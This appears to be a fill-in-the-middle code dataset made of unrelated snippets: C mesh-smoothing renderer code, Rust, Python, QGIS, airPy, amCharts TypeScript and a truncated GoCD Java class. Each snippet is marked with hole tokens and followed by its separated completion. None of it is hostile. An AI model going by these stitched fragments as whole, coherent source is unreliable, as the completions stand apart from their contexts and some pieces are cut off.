VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
} else {
const float frac = 1.0 / (0.00001);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
}
/* normalize */
VectorNormalizeFast(triangleNormals[j]);
VectorNormalizeFast(triangleTangents[j]);
VectorNormalizeFast(triangleBitangents[j]);
Orthogonalize(triangleTangents[j], triangleBitangents[j]);
}
/* do smoothing */
for (i = 0; i < numIndexes; i++) {
const int idx = (i - i % 3) / 3;
VectorCopy(triangleNormals[idx], tmpVertexes[i].normal);
VectorCopy(triangleTangents[idx], tmpVertexes[i].tangent);
VectorCopy(triangleBitangents[idx], tmpBitangents[i]);
for (j = 0; j < numIndexes; j++) {
const int idx2 = (j - j % 3) / 3;
/* don't add a vertex with itself */
if (j == i)
continue;
/* only average normals if vertices have the same position
* and the normals aren't too far apart to start with */
if (VectorEqual(vertexes[indexArray[i]].point, vertexes[indexArray[j]].point)
&& DotProduct(triangleNormals[idx], triangleNormals[idx2]) > smoothness) {
/* average the normals */
VectorAdd(tmpVertexes[i].normal, triangleNormals[idx2], tmpVertexes[i].normal);
/* if the tangents match as well, average them too.
* Note that having matching normals without matching tangents happens
* when the order of vertices in two triangles sharing the vertex
* in question is different. This happens quite frequently if the
* modeler does not go out of their way to avoid it. */
if (Vector2Equal(stcoords[indexArray[i]], stcoords[indexArray[j]])
&& DotProduct(triangleTangents[idx], triangleTangents[idx2]) > smoothness
&& DotProduct(triangleBitangents[idx], triangleBitangents[idx2]) > smoothness) {
/* average the tangents */
VectorAdd(tmpVertexes[i].tangent, triangleTangents[idx2], tmpVertexes[i].tangent);
VectorAdd(tmpBitangents[i], triangleBitangents[idx2], tmpBitangents[i]);
}
}
}
VectorNormalizeFast(tmpVertexes[i].normal);
VectorNormalizeFast(tmpVertexes[i].tangent);
VectorNormalizeFast(tmpBitangents[i]);
}
/* assume all vertices are unique until proven otherwise */
for (i = 0; i < numIndexes; i++)
indRemap[i] = -1;
/* merge vertices that have become identical */
for (i = 0; i < numIndexes; i++) {
vec3_t n, b, t, v;
if (indRemap[i] != -1)
continue;
for (j = i + 1; j < numIndexes; j++) {
if (Vector2Equal(stcoords[indexArray[i]], stcoords[indexArray[j]])
&& VectorEqual(vertexes[indexArray[i]].point, vertexes[indexArray[j]].point)
&& (DotProduct(tmpVertexes[i].normal, tmpVertexes[j].normal) > smoothness)
&& (DotProduct(tmpVertexes[i].tangent, tmpVertexes[j].tangent) > smoothness)) {
indRemap[j] = i;
newIndexArray[j] = numVerts;
}
}
VectorCopy(tmpVertexes[i].normal, n);
VectorCopy(tmpVertexes[i].tangent, t);
VectorCopy(tmpBitangents[i], b);
/* normalization here does shared-vertex smoothing */
VectorNormalizeFast(n);
VectorNormalizeFast(t);
VectorNormalizeFast(b);
/* Grahm-Schmidt orthogonalization */
VectorMul(DotProduct(t, n), n, v);
VectorSubtract(t, v, t);
VectorNormalizeFast(t);
/* calculate handedness */
CrossProduct(n, t, v);
tmpVertexes[i].tangent[3] = (DotProduct(v, b) < 0.0) ? -1.0 : 1.0;
VectorCopy(n, tmpVertexes[i].normal);
VectorCopy(t, tmpVertexes[i].tangent);
newIndexArray[i] = numVerts++;
indRemap[i] = i;
}
for (i = 0; i < numVerts; i++)
sharedTris[i] = 0;
for (i = 0; i < numIndexes; i++)
sharedTris[newIndexArray[i]]++;
/* set up reverse-index that maps Vertex objects to a list of triangle verts */
mesh->revIndexes = Mem_PoolAllocTypeN(mIndexList_t, numVerts, vid_modelPool);
for (i = 0; i < numVerts; i++) {
mesh->revIndexes[i].length = 0;
mesh->revIndexes[i].list = Mem_PoolAllocTypeN(int32_t, sharedTris[i], vid_modelPool);
}
/* merge identical vertexes, storing only unique ones */
mAliasVertex_t* const newVertexes = Mem_PoolAllocTypeN(mAliasVertex_t, numVerts * nFrames, vid_modelPool);
mAliasCoord_t* const newStcoords = Mem_PoolAllocTypeN(mAliasCoord_t, numVerts, vid_modelPool);
for (i = 0; i < numIndexes; i++) {
const int idx = indexArray[indRemap[i]];
const int idx2 = newIndexArray[i];
/* add vertex to new vertex array */
VectorCopy(vertexes[idx].point, newVertexes[idx2].point);
Vector2Copy(stcoords[idx], newStcoords[idx2]);
mesh->revIndexes[idx2].list[mesh->revIndexes[idx2].length++] = i;
}
/* copy over the points from successive frames */
for (i = 1; i < nFrames; i++) {
for (j = 0; j < numIndexes; j++) {
const int idx = indexArray[indRemap[j]] + (mesh->num_verts * i);
const int idx2 = newIndexArray[j] + (numVerts * i);
VectorCopy(vertexes[idx].point, newVertexes[idx2].point);
}
}
/* copy new arrays back into original mesh */
Mem_Free(mesh->stcoords);
Mem_Free(mesh->indexes);
Mem_Free(mesh->vertexes);
mesh->num_verts = numVerts;
mesh->vertexes = newVertexes;
mesh->stcoords = newStcoords;
mesh->indexes = newIndexArray;
}
image_t* R_AliasModelGetSkin (const char *modelFileName, const char *skin)
{
image_t* result;
if (skin[0] != '.')
result = R_FindImage(skin, it_skin);
else {
char path[MAX_QPATH];
Com_ReplaceFilename(modelFileName, skin + 1, path, sizeof(path));
result = R_FindImage(path, it_skin);
}
return result;
}
image_t* R_AliasModelState (const model_t *mod, int *mesh, int *frame, int *oldFrame, int *skin)
{
/* check animations */
if ((*frame >= mod->alias.num_frames) || *frame < 0) {
Com_Printf("R_AliasModelState %s: no such frame %d (# %i)\n", mod->name, *frame, mod->alias.num_frames);
*frame = 0;
}
if ((*oldFrame >= mod->alias.num_frames) || *oldFrame < 0) {
Com_Printf("R_AliasModelState %s: no such oldframe %d (# %i)\n", mod->name, *oldFrame, mod->alias.num_frames);
*oldFrame = 0;
}
if (*mesh < 0 || *mesh >= mod->alias.num_meshes)
*mesh = 0;
if (!mod->alias.meshes)
return NULL;
/* use default skin - this is never null - but maybe the placeholder texture */
if (*skin < 0 || *skin >= mod->alias.meshes[*mesh].num_skins)
*skin = 0;
if (!mod->alias.meshes[*mesh].num_skins)
Com_Error(ERR_DROP, "Model with no skins");
if (mod->alias.meshes[*mesh].skins[*skin].skin->texnum <= 0)
Com_Error(ERR_DROP, "Texture is already freed and no longer uploaded, texnum is invalid for model %s",
mod->name);
return mod->alias.meshes[*mesh].skins[*skin].skin;
}
/**
* @brief Converts the model data into the opengl arrays
* @param mod The model to convert
* @param mesh The particular mesh of the model to convert
* @param backlerp The linear back interpolation when loading the data
* @param framenum The frame number of the mesh to load (if animated)
* @param oldframenum The old frame number (used to interpolate)
* @param prerender If this is @c true, all data is filled to the arrays. If @c false, then
* e.g. the normals are only filled to the arrays if the lighting is activated.
*
* @note If GLSL programs are enabled, the actual interpolation will be done on the GPU, but
* this function is still needed to fill the GL arrays for the keyframes
*/
void R_FillArrayData (mAliasModel_t* mod, mAliasMesh_t *mesh, float backlerp, int framenum, int oldframenum, bool prerender)
{
const mAliasFrame_t *frame, *oldframe;
vec3_t move;
const float frontlerp = 1.0 - backlerp;
vec3_t r_mesh_verts[MAX_ALIAS_VERTS];
vec_t *texcoord_array, *vertex_array_3d;
frame = mod->frames + framenum;
oldframe = mod->frames + oldframenum;
/* try to do keyframe-interpolation on the GPU if possible*/
if (r_state.lighting_enabled) {
/* we only need to change the array data if we've switched to a new keyframe */
if (mod->curFrame != framenum) {
/* if we're rendering frames in order, the "next" keyframe from the previous
* time through will be our "previous" keyframe now, so we can swap pointers
* instead of generating it again from scratch */
if (mod->curFrame == oldframenum) {
vec_t *tmp1 = mesh->verts;
vec_t *tmp2 = mesh->normals;
vec_t *tmp3 = mesh->tangents;
mesh->verts = mesh->next_verts;
mesh->next_verts = tmp1;
mesh->normals = mesh->next_normals;
mesh->next_normals = tmp2;
mesh->tangents = mesh->next_tangents;
mesh->next_tangents = tmp3;
/* if we're alternating between two keyframes, we don't need to generate
* anything; otherwise, generate the "next" keyframe*/
if (mod->oldFrame != framenum)
R_ModCalcNormalsAndTangents(mesh, framenum, frame->translate, false);
} else {
/* if we're starting a new animation or otherwise not rendering keyframes
* in order, we need to fill the arrays for both keyframes */
R_ModCalcNormalsAndTangents(mesh, oldframenum, oldframe->translate, true);
R_ModCalcNormalsAndTangents(mesh, framenum, frame->translate, false);
}
/* keep track of which keyframes are currently stored in our arrays */
mod->oldFrame = oldframenum;
mod->curFrame = framenum;
}
} else { /* otherwise, we have to do it on the CPU */
const mAliasVertex_t *v, *ov;
int i;
assert(mesh->num_verts < lengthof(r_mesh_verts));
v = &mesh->vertexes[framenum * mesh->num_verts];
ov = &mesh->vertexes[oldframenum * mesh->num_verts];
if (prerender)
R_ModCalcNormalsAndTangents(mesh, 0, oldframe->translate, true);
for (i = 0; i < 3; i++)
move[i] = backlerp * oldframe->translate[i] + frontlerp * frame->translate[i];
for (i = 0; i < mesh->num_verts; i++, v++, ov++) { /* lerp the verts */
VectorSet(r_mesh_verts[i],
move[0] + ov->point[0] * backlerp + v->point[0] * frontlerp,
move[1] + ov->point[1] * backlerp + v->point[1] * frontlerp,
move[2] + ov->point[2] * backlerp + v->point[2] * frontlerp);
}
R_ReallocateStateArrays(mesh->num_tris * 3);
R_ReallocateTexunitArray(&texunit_diffuse, mesh->num_tris * 3);
texcoord_array = texunit_diffuse.texcoord_array;
vertex_array_3d = r_state.vertex_array_3d;
/** @todo damn slow - optimize this */
for (i = 0; i < mesh->num_tris; i++) { /* draw the tris */
int j;
for (j = 0; j < 3; j++) {
const int arrayIndex = 3 * i + j;
const int meshIndex = mesh->indexes[arrayIndex];
Vector2Copy(mesh->stcoords[meshIndex], texcoord_array);
VectorCopy(r_mesh_verts[meshIndex], vertex_array_3d);
texcoord_array += 2;
vertex_array_3d += 3;
}
}
}
}
/**
* @brief Allocates data arrays for animated models. Only called once at loading time.
*/
void R_ModLoadArrayData (mAliasModel_t *mod, mAliasMesh_t *mesh, bool loadNormals)
{
const int v = mesh->num_tris * 3 * 3;
const int t = mesh->num_tris * 3 * 4;
const int st = mesh->num_tris * 3 * 2;
assert(mesh->verts == NULL);
assert(mesh->texcoords == NULL);
assert(mesh->normals == NULL);
assert(mesh->tangents == NULL);
assert(mesh->next_verts == NULL);
assert(mesh->next_normals == NULL);
assert(mesh->next_tangents == NULL);
mesh->verts = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->normals = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->tangents = Mem_PoolAllocTypeN(float, t, vid_modelPool);
mesh->texcoords = Mem_PoolAllocTypeN(float, st, vid_modelPool);
if (mod->num_frames == 1) {
R_FillArrayData(mod, mesh, 0.0, 0, 0, loadNormals);
} else {
mesh->next_verts = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->next_normals = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->next_tangents = Mem_PoolAllocTypeN(float, t, vid_modelPool);
mod->curFrame = -1;
mod->oldFrame = -1;
}
}<|fim▁end|> | as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version. |
<|file_name|>foo.rs<|end_file_name|><|fim▁begin|>pub use private::Quz;
pub use hidden::Bar;
mod private {
pub struct Quz;
}
#[doc(hidden)]
pub mod hidden {
pub struct Bar;
}
#[macro_export]
macro_rules! foo {<|fim▁hole|>}<|fim▁end|> | () => {} |
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>"Utility functions for the tests."
import json
def get_settings(**defaults):
"Update the default settings by the contents of the 'settings.json' file."
result = defaults.copy()
with open("settings.json", "rb") as infile:
data = json.load(infile)
for key in result:
try:
result[key] = data[key]
except KeyError:
pass
if result.get(key) is None:
raise KeyError(f"Missing {key} value in settings.")
# Remove any trailing slash in the base URL.
result["BASE_URL"] = result["BASE_URL"].rstrip("/")<|fim▁hole|><|fim▁end|> | return result |
<|file_name|>AutoincrementalField.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
***************************************************************************
AutoincrementalField.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *<|fim▁hole|>***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeature, QgsGeometry
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class AutoincrementalField(GeoAlgorithm):
INPUT = 'INPUT'
OUTPUT = 'OUTPUT'
def processAlgorithm(self, progress):
output = self.getOutputFromName(self.OUTPUT)
vlayer = \
dataobjects.getObjectFromUri(self.getParameterValue(self.INPUT))
vprovider = vlayer.dataProvider()
fields = vprovider.fields()
fields.append(QgsField('AUTO', QVariant.Int))
writer = output.getVectorWriter(fields, vprovider.geometryType(),
vlayer.crs())
inFeat = QgsFeature()
outFeat = QgsFeature()
inGeom = QgsGeometry()
nElement = 0
features = vector.features(vlayer)
nFeat = len(features)
for inFeat in features:
progress.setPercentage(int(100 * nElement / nFeat))
nElement += 1
inGeom = inFeat.geometry()
outFeat.setGeometry(inGeom)
attrs = inFeat.attributes()
attrs.append(nElement)
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
del writer
def defineCharacteristics(self):
self.name = 'Add autoincremental field'
self.group = 'Vector table tools'
self.addParameter(ParameterVector(self.INPUT,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Incremented')))<|fim▁end|> | * the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* * |
<|file_name|>ap_save_tx_calibration.py<|end_file_name|><|fim▁begin|>"""
airPy is a flight controller based on pyboard and written in micropython.
The MIT License (MIT)
Copyright (c) 2016 Fabrizio Scimia, [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import struct
class SaveTxCalibration:
MESSAGE_TYPE_ID = 110
def __init__(self):
pass
@staticmethod
def decode_payload(payload):
"""
Decode message payload
:param payload: byte stream representing the message payload
:return: a list of 3 list of floats representing the PWM threshold values for each of the N active channels
[[min threshold values],[max threshold values], [center threshold values]]
"""
# 4 byte per float * 3 set of thesholds
byte_per_thd_set = int(len(payload)/3)
min_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
max_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
center_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
for i in range(0, int(byte_per_thd_set/4)):
min_thd_vals[i] = struct.unpack('>f', payload[i*4:i*4 + 4])[0]
for i in range(0, int(byte_per_thd_set/4)):<|fim▁hole|> center_thd_vals[i] = struct.unpack('>f', payload[2*byte_per_thd_set + i*4:i*4 + 2*byte_per_thd_set + 4])[0]
return [min_thd_vals, max_thd_vals, center_thd_vals]<|fim▁end|> | max_thd_vals[i] = struct.unpack('>f', payload[byte_per_thd_set + i*4:i*4 + 4 + byte_per_thd_set])[0]
for i in range(0, int(byte_per_thd_set/4)): |
<|file_name|>PercentSeries.d.ts<|end_file_name|><|fim▁begin|>/**
* Defines Percent Chart Series.
*/
/**
* ============================================================================
* IMPORTS
* ============================================================================
* @hidden
*/
import { Series, SeriesDataItem, ISeriesProperties, ISeriesDataFields, ISeriesAdapters, ISeriesEvents } from "./Series";
import { ISpriteEvents, AMEvent } from "../../core/Sprite";
import { Sprite } from "../../core/Sprite";
import { Label } from "../../core/elements/Label";
import { Tick } from "../elements/Tick";
import { ListTemplate } from "../../core/utils/List";
import { Container } from "../../core/Container";
import { Animation } from "../../core/utils/Animation";
import { LegendDataItem, LegendSettings } from "../../charts/Legend";
import { ColorSet } from "../../core/utils/ColorSet";
import { PatternSet } from "../../core/utils/PatternSet";
import { PercentChart } from "../types/PercentChart";
import * as $type from "../../core/utils/Type";
/**
* ============================================================================
* DATA ITEM
* ============================================================================
* @hidden
*/
/**
* Defines a [[DataItem]] for [[PercentSeries]].
*
* @see {@link DataItem}
*/
export declare class PercentSeriesDataItem extends SeriesDataItem {
    /**
     * A type of slice used for this series.
     */
    _slice: Sprite;
    /**
     * A reference to a slice label element.
     *
     * @ignore Exclude from docs
     */
    _label: Label;
    /**
     * A reference to a slice tick element.
     *
     * @ignore Exclude from docs
     */
    _tick: Tick;
    /**
     * A reference to a corresponding legend data item.
     */
    protected _legendDataItem: LegendDataItem;
    /**
     * Custom settings for the legend item.
     * Not used, only added to satisfy LegendDataItem.
     *
     * @ignore
     */
    legendSettings: LegendSettings;
    /**
     * Defines a type of [[Component]] this data item is used for.
     */
    _component: PercentSeries;
    /**
     * Constructor
     */
    constructor();
    /**
     * Adds an `id` attribute to the slice element and returns its id.
     *
     * @ignore Exclude from docs
     */
    uidAttr(): string;
    /**
     * Hide the data item (and corresponding visual elements).
     *
     * @param duration  Duration (ms)
     * @param delay     Delay hiding (ms)
     * @param toValue   Target value for animation
     * @param fields    Fields to animate while hiding
     */
    hide(duration?: number, delay?: number, toValue?: number, fields?: string[]): $type.Optional<Animation>;
    /**
     * Sets visibility of the Data Item.
     *
     * @param value           Visibility flag
     * @param noChangeValues  If `true`, related values are not updated
     */
    setVisibility(value: boolean, noChangeValues?: boolean): void;
    /**
     * Show hidden data item (and corresponding visual elements).
     *
     * @param duration  Duration (ms)
     * @param delay     Delay showing (ms)
     * @param fields    Fields to animate while showing
     */
    show(duration?: number, delay?: number, fields?: string[]): $type.Optional<Animation>;
    /**
     * Category.
     *
     * @param value  Category
     */
    /**
     * @return Category
     */
    category: string;
    /**
     * Creates a marker used in the legend for this slice.
     *
     * @ignore Exclude from docs
     * @param marker  Marker container
     */
    createLegendMarker(marker: Container): void;
    /**
     * A legend's data item, that corresponds to this data item.
     *
     * @param value  Legend data item
     */
    /**
     * @return Legend data item
     */
    legendDataItem: LegendDataItem;
    /**
     * A Tick element, related to this data item. (slice)
     *
     * @readonly
     * @return Tick element
     */
    readonly tick: this["_tick"];
    /**
     * A Label element, related to this data item. (slice)
     *
     * @readonly
     * @return Label element
     */
    readonly label: this["_label"];
    /**
     * An element, related to this data item. (slice)
     *
     * @readonly
     * @return Slice element
     */
    readonly slice: this["_slice"];
    /**
     * Should dataItem (slice) be hidden in legend?
     *
     * @param value  Visible in legend?
     */
    /**
     * @return Disabled in legend?
     */
    hiddenInLegend: boolean;
}
/**
* ============================================================================
* REQUISITES
* ============================================================================
* @hidden
*/
/**
* Defines data fields for [[PercentSeries]].
*/
export interface IPercentSeriesDataFields extends ISeriesDataFields {
    /**
     * Name of the field in data that holds category.
     */
    category?: string;
    /**
     * Name of the field in data that holds a boolean flag indicating whether
     * the item should be hidden in legend.
     */
    hiddenInLegend?: string;
}
/**
 * Defines properties for [[PercentSeries]].
 */
export interface IPercentSeriesProperties extends ISeriesProperties {
    /**
     * A color set to be used for slices.
     *
     * For each new subsequent slice, the chart will assign the next color in
     * this set.
     */
    colors?: ColorSet;
    /**
     * Pattern set to apply to fills.
     *
     * @since 4.7.5
     */
    patterns?: PatternSet;
    /**
     * Align labels into nice vertical columns?
     *
     * @default true
     */
    alignLabels?: boolean;
    /**
     * If set to `true` the chart will not show slices with zero values.
     *
     * @default false
     * @since 4.7.9
     */
    ignoreZeroValues?: boolean;
}
/**
 * Defines events for [[PercentSeries]].
 */
export interface IPercentSeriesEvents extends ISeriesEvents {
}
/**
 * Defines adapters for [[PercentSeries]].
 *
 * @see {@link Adapter}
 */
export interface IPercentSeriesAdapters extends ISeriesAdapters, IPercentSeriesProperties {
}
/**
* ============================================================================
* MAIN CLASS
* ============================================================================
* @hidden
*/
/**
* Defines [[PercentSeries]] which is a base class for [[PieSeries]],
* [[FunnelSeries]], and [[PyramidSeries]].
*
* @see {@link IPercentSeriesEvents} for a list of available Events
* @see {@link IPercentSeriesAdapters} for a list of available Adapters
*/
export declare class PercentSeries extends Series {
    /**
     * Defines type of the slice elements for the series.
     */
    _slice: Sprite;
    /**
     * Defines type of the tick elements for the series.
     */
    _tick: Tick;
    /**
     * Defines type of the label elements for the series.
     */
    _label: Label;
    /**
     * A reference to chart this series is for.
     *
     * @ignore Exclude from docs
     */
    _chart: PercentChart;
    /**
     * Defines the type of data fields used for the series.
     */
    _dataFields: IPercentSeriesDataFields;
    /**
     * Defines available properties.
     */
    _properties: IPercentSeriesProperties;
    /**
     * Defines available adapters.
     */
    _adapter: IPercentSeriesAdapters;
    /**
     * Defines available events.
     */
    _events: IPercentSeriesEvents;
    /**
     * Defines the type of data item.
     */
    _dataItem: PercentSeriesDataItem;
    /**
     * Container slice elements are put in.
     */
    slicesContainer: Container;
    /**
     * Container tick elements are put in.
     */
    ticksContainer: Container;
    /**
     * Container label elements are put in.
     */
    labelsContainer: Container;
    /**
     * List of slice elements.
     */
    protected _slices: ListTemplate<this["_slice"]>;
    /**
     * List of tick elements.
     */
    protected _ticks: ListTemplate<this["_tick"]>;
    /**
     * List of label elements.
     */
    protected _labels: ListTemplate<this["_label"]>;
    /**
     * Constructor
     */
    constructor();
    /**
     * Creates a slice element.
     *
     * @return Slice
     */
    protected createSlice(): this["_slice"];
    /**
     * Creates a tick element.
     *
     * @return Tick
     */
    protected createTick(): this["_tick"];
    /**
     * Creates a label element.
     *
     * @return Label
     */
    protected createLabel(): this["_label"];
    /**
     * A list of slice elements for the series.
     *
     * Use its `template` to configure look and behavior of the slices. E.g.:
     *
     * ```TypeScript
     * series.slices.template.stroke = am4core.color("#fff");
     * series.slices.template.strokeWidth = 2;
     * ```
     * ```JavaScript
     * series.slices.template.stroke = am4core.color("#fff");
     * series.slices.template.strokeWidth = 2;
     * ```
     * ```JSON
     * {
     *   // ...
     *   "series": [{
     *     // ...
     *     "slices": {
     *       "stroke": "#fff",
     *       "strokeWidth": 2
     *     }
     *   }]
     * }
     * ```
     *
     * @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
     * @return Slices
     */
    readonly slices: ListTemplate<this["_slice"]>;
    /**
     * A list of tick elements for the series. Ticks connect slice to its label.
     *
     * Use its `template` to configure look and behavior of the ticks. E.g.:
     *
     * ```TypeScript
     * series.ticks.template.strokeWidth = 2;
     * ```
     * ```JavaScript
     * series.ticks.template.strokeWidth = 2;
     * ```
     * ```JSON
     * {
     *   // ...
     *   "series": [{
     *     // ...
     *     "ticks": {
     *       "strokeWidth": 2
     *     }
     *   }]
     * }
     * ```
     *
     * @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
     * @return Ticks
     */
    readonly ticks: ListTemplate<this["_tick"]>;
    /**
     * A list of slice label elements for the series.
     *
     * Use its `template` to configure look and behavior of the labels. E.g.:
     *
     * ```TypeScript
     * series.labels.template.fill = am4core.color("#c00");
     * series.labels.template.fontSize = 20;
     * ```
     * ```JavaScript
     * series.labels.template.fill = am4core.color("#c00");
     * series.labels.template.fontSize = 20;
     * ```
     * ```JSON
     * {
     *   // ...
     *   "series": [{
     *     // ...
     *     "labels": {
     *       "stroke": "#c00",
     *       "fontSize": 20
     *     }
     *   }]
     * }
     * ```
     *
     * @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
     * @return Labels
     */
    readonly labels: ListTemplate<this["_label"]>;
    /**
     * Returns a new/empty DataItem of the type appropriate for this object.
     *
     * @see {@link DataItem}
     * @return Data Item
     */
    protected createDataItem(): this["_dataItem"];
    /**
     * Initializes a newly created slice element.
     *
     * @param slice  Slice element to initialize
     */
    protected initSlice(slice: this["_slice"]): void;
    /**
     * Initializes a newly created label element.
     *
     * @param label  Label element to initialize
     */
    protected initLabel(label: this["_label"]): void;
    /**
     * Initializes a newly created tick element.
     *
     * @param label  Tick element to initialize (parameter name kept for compatibility)
     */
    protected initTick(label: this["_tick"]): void;
    /**
     * Validates (processes) data items.
     *
     * @ignore Exclude from docs
     */
    validateDataItems(): void;
    /**
     * Validates data item's element, effectively redrawing it.
     *
     * @ignore Exclude from docs
     * @param dataItem  Data item
     */
    validateDataElement(dataItem: this["_dataItem"]): void;
    /**
     * Validates (processes) data.
     *
     * @ignore Exclude from docs
     */
    validateData(): void;
    /**
     * Arranges slice labels according to position settings.
     *
     * @ignore Exclude from docs
     * @param dataItems  Data items
     */
    protected arrangeLabels(dataItems: this["_dataItem"][]): void;
    /**
     * Alternative label-arrangement pass.
     *
     * @ignore Exclude from docs
     * @param dataItems  Data items
     */
    protected arrangeLabels2(dataItems: this["_dataItem"][]): void;
    /**
     * Returns the next label according to `index`.
     *
     * @param index      Current index
     * @param dataItems  Data items
     * @return Label element
     */
    protected getNextLabel(index: number, dataItems: this["_dataItem"][]): this["_label"];
    /**
     * A color set to be used for slices.
     *
     * For each new subsequent slice, the chart will assign the next color in
     * this set.
     *
     * @param value  Color set
     */
    /**
     * @return Color set
     */
    colors: ColorSet;
    /**
     * A [[PatternSet]] to use when creating patterned fills for slices.
     *
     * @since 4.7.5
     * @param value  Pattern set
     */
    /**
     * @return Pattern set
     */
    patterns: PatternSet;
    /**
     * Binds related legend data item's visual settings to this series' visual
     * settings.
     *
     * @ignore Exclude from docs
     * @param marker    Container
     * @param dataItem  Data item
     */
    createLegendMarker(marker: Container, dataItem?: this["_dataItem"]): void;
    /**
     * Repositions bullets when slice's size changes.
     *
     * @ignore Exclude from docs
     * @param event  Event
     */
    protected handleSliceScale(event: AMEvent<this["_slice"], ISpriteEvents>["propertychanged"]): void;
    /**
     * Repositions bullet and labels when slice moves.
     *
     * @ignore Exclude from docs
     * @param event  Event
     */
    protected handleSliceMove(event: AMEvent<this["_slice"], ISpriteEvents>["propertychanged"]): void;
    /**
     * Copies all properties from another instance of [[PercentSeries]].
     *
     * @param source  Source series
     */
    copyFrom(source: this): void;
    /**
     * Align labels into nice vertical columns?
     *
     * This will ensure that labels never overlap with each other.
     *
     * Arranging labels into columns makes them more readable, and better user
     * experience.
     *
     * If set to `false` labels will be positioned at `label.radius` distance,
     * and may, in some cases, overlap.
     *
     * @default true
     * @param value  Align labels?
     */
    /**
     * @return Align labels?
     */
    alignLabels: boolean;
    /**
     * @ignore
     */
    protected setAlignLabels(value: boolean): void;
    /**
     * If set to `true` the chart will not show slices with zero values.
     *
     * @default false
     * @since 4.7.9
     * @param value  Ignore zero values
     */
    /**
     * @return Ignore zero values
     */
    ignoreZeroValues: boolean;
    /**
     * Updates corresponding legend data item with current values.
     *
     * @ignore Exclude from docs
     * @param dataItem  Data item
     */
    updateLegendValue(dataItem?: this["_dataItem"]): void;
}
|
/*
* Copyright 2020 ThoughtWorks, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
*/
package com.thoughtworks.go.domain.materials.scm;
import com.thoughtworks.go.config.materials.PluggableSCMMaterial;
import com.thoughtworks.go.domain.MaterialRevision;
import com.thoughtworks.go.domain.config.Configuration;
import com.thoughtworks.go.domain.config.ConfigurationProperty;
import com.thoughtworks.go.domain.materials.MaterialAgent;
import com.thoughtworks.go.domain.materials.Modification;
import com.thoughtworks.go.domain.scm.SCM;
import com.thoughtworks.go.plugin.access.scm.SCMExtension;
import com.thoughtworks.go.plugin.access.scm.SCMProperty;
import com.thoughtworks.go.plugin.access.scm.SCMPropertyConfiguration;
import com.thoughtworks.go.plugin.access.scm.revision.SCMRevision;
import com.thoughtworks.go.plugin.api.response.Result;
import com.thoughtworks.go.util.command.ConsoleOutputStreamConsumer;
import org.apache.commons.lang3.StringUtils;
import java.io.File;
import static com.thoughtworks.go.util.command.TaggedStreamConsumer.PREP_ERR;
public class PluggableSCMMaterialAgent implements MaterialAgent {
private SCMExtension scmExtension;
private MaterialRevision revision;
private File workingDirectory;
private final ConsoleOutputStreamConsumer consumer;
public PluggableSCMMaterialAgent(SCMExtension scmExtension,
MaterialRevision revision,
File workingDirectory,
ConsoleOutputStreamConsumer consumer) {
this.scmExtension = scmExtension;
this.revision = revision;
this.workingDirectory = workingDirectory;
this.consumer = consumer;
}
@Override
public void prepare() {
try {
PluggableSCMMaterial material = (PluggableSCMMaterial) revision.getMaterial();
Modification latestModification = revision.getLatestModification();
